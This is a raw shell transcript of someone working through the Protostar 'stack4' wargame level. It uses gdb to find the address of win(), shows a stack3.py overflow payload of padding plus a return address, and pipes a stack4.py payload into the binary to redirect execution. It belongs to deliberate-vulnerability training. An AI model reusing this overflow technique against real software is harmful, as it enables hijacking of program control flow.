gdb /opt/protostar/bin/stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) show functions
Undefined show command: "functions".  Try "help show".
(gdb) info  functions
All defined functions:

File stack4/stack4.c:
int main(int, char **);
void win(void);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048420  __libc_csu_fini
0x08048430  __libc_csu_init
0x0804848a  __i686.get_pc_thunk.bx
0x08048490  __do_global_ctors_aux
0x080484bc  _fini
(gdb) x win
0x80483f4 <win>:        0x83e58955
(gdb) x main
0x8048408 <main>:       0x83e58955
(gdb) ^Z
[4]+  Stopped                 gdb /opt/protostar/bin/stack4
user@protostar:/tmp$ objdump -t /opt/protostar/bin/stack4 | grep win
bash: /usr/bin/objdump: Input/output error
user@protostar:/tmp$ ls
ext  stack3.py
user@protostar:/tmp$ cat stack3.py 
payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += "\x24\x84\x48\x80" # address of win
print payload
user@protostar:/tmp$ vi stack4.py
user@protostar:/tmp$ python stack4.py > st4
  File "stack4.py", line 5
    eip = struct.pack("I",\x080483f4)
                                    ^
SyntaxError: unexpected character after line continuation character
user@protostar:/tmp$ vi stack4.py
user@protostar:/tmp$ python stack4.py > st4
Traceback (most recent call last):
  File "stack4.py", line 5, in <module>
    eip = struct.pack("I",x080483f4)
NameError: name 'x080483f4' is not defined
user@protostar:/tmp$ pip install struct
bash: pip: command not found
user@protostar:/tmp$ apt-get install python-pip
bash: /usr/bin/apt-get: Input/output error
user@protostar:/tmp$ sudo apt-get install python-pip
sudo: unable to resolve host protostar

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for user: 
user is not in the sudoers file.  This incident will be reported.
user@protostar:/tmp$ python stack4.py > st4
Traceback (most recent call last):
  File "stack4.py", line 5, in <module>
    eip = struct.pack("I",x080483f4)
NameError: name 'x080483f4' is not defined
user@protostar:/tmp$ vi stack4.py
user@protostar:/tmp$ python stack4.py > st4
user@protostar:/tmp$ python stack4.py | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault
user@protostar:/tmp$ 

